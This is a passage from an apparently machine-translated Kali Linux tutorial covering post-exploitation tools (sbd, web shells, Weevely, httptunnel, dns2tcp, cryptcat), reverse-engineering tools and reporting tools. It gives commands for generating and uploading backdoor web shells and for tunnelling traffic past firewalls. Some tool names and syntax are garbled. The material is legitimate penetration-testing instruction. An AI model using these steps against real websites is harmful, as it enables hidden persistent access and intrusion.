On the victim's website, enter "sbd IPofserver port" . A connection will be established over which we can send remote commands.
In this case, it's "localhost" because we're testing on the same machine.
Finally, on the server, you will see that the connection has taken place, as shown in the following screenshot.
Web shells
Web shells can be used to maintain access or hack a website. But most of them are detected by antiviruses. The C99 php shell is very well known among antiviruses. Any common antivirus will easily recognize it as malware.
Typically, their main function is to send system commands through web interfaces.
To open it, type “cd /usr/share/webshells/” in a terminal.
As you can see, they are divided into classes according to the programming language: asp, aspx, cfm, jsp, perl, php.
If you go into the PHP folder you will see all web wrappers for php web pages.
To upload a wrapper to a web server, such as “simple-backdoor.php”, open the web page and the URL of the web wrapper.
At the end write cmd command. You will have all the information shown in the following screenshot.
Weevely
Weevely is a PHP web shell that mimics a telnet-like connection. It is a web application post-exploitation tool that can be used as a hidden backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.
To open it go to the terminal and type "weevely" to see its usage.
To generate a shell, type “weevely generate password pathoffile” . As seen in the following screenshot, it is created in the Desktop folder and the file must be uploaded to the web server in order to be accessed.
After loading the web shell as shown in the following screenshot, we can connect with cmd to the server using the “weevely URL password” command where we can see that the session has started.
http tunnel
http-tunnel creates a bi-directional virtual traffic that is tunneled in HTTP requests. Optionally, requests can be sent through an HTTP proxy. This can be useful for users behind restrictive firewalls. If access to the WWW is allowed through an HTTP proxy, you can use an http tunnel and telnet or PPP to connect to a computer outside the firewall.
First, we have to create a tunnel server with the following command -
httptunnel_server –h
Then on the client site type "httptunnel_client -h" and both will start accepting connections.
dns2tcp
This is again a tunneling tool that helps to pass TCP traffic through DNS traffic, which means UDP port 53.
To run it, type "dns2tcpd" . Usage is explained when you open the script.
On the server site, enter this command to set up the file.
#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
On the client site, enter this command.
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
Tunneling will start with this command.
cryptographer
This is another tool, such as Netcat, that allows you to establish a TCP and UDP connection to the victim's machine in encrypted form.
To start the server to listen for a connection, type the following command -
cryptcat –l –p port –n
Where,
-l means listen for a connection
-p stands for port number option
-n means no name resolution
On the client site, the connection command is “cryptcat IPofServer PortofServer”
In this chapter, we will learn about Kali Linux reverse engineering tools.
OllyDbg
OllyDbg is a 32-bit assembler-level analysis debugger for Microsoft Windows applications. The emphasis on binary code analysis makes it especially useful in cases where the source code is not available. Typically, it is used to crack commercial software.
To open it go to Applications → Reverse Engineering → ollydbg.
To download the EXE file, navigate to the yellow colored "Opening Folder", which is shown in the red square in the screenshot above.
Once downloaded, you will have the following view where you can modify the binaries.
dex2jar
This is an application that helps to convert APK (android) file to JAR file to view the source code. To use it, open a terminal and type ”d2j-dex2jar –d /file location” .
In this case, the “classes.dex” file is on the desktop.
The next line shows that the JAR file has been created.
jd-gui
JD-GUI is a standalone graphical utility that displays Java source code “.class” files. You can view the restored source code. In this case, we can restore the file extracted from the dex2jar tool.
To run it, open a terminal and type “jd-gui” and the following view will open.
To import a file, click the open folder iconin the upper left corner and then import the file.
apk tool
Apktool is one of the best tool to change the whole android application. It can decode resources to near-original form and restore them after changes have been made.
To open it go to the terminal and type “apktool” .
To decompile an apk file write "apktool d apk file" .
Decompilation will start as shown in the following screenshot.
In this chapter, we will learn about some of the reporting tools in Kali Linux.
Dradis
In all this work that we have done, it is important to share the results obtained, track our work, etc. For this purpose, Kali has a reporting tool called dradis, which is a web service.
Step 1 - To start Dradis, type “service dradis start” .
Step 2 - To open, go to Applications → Reporting Tools → dradis.
The web address will open. Anyone on the local network can open it with the following url https:// Kali machine's IP: 3004
Log in with the username and password you used for the first time.
Step 3 - After logging in, you can import files from NMAP, NESSUS, NEXPOSE. To do this, go to "Import from File" → click on "New Importer (with real-time feedback)".
Step 4 - Select the file type you want to upload. In this case, it's "Nessus scan" → click "Browse".
If you go to the homepage now, you will see in the left pane that the imported scanned images are in the host and port data folder.
Metagophile
Metagoofil searches Google to identify and download documents to a local drive, and then extracts the metadata. It extracts metadata from public documents owned by a particular company, individual, entity, etc.
To open it, follow the link: “usr/share/metagoofil/” .
To start searching, enter the following command -
python metagoofil.py
You can use the following options with this command -
-d (domain name)
-t (file type to upload dox, pdf, etc.)
–l (limit results to 10, 100)
–n (restrict file downloads)
–o (location to save files)
-f (output file)
The following example shows that only the domain name is hidden.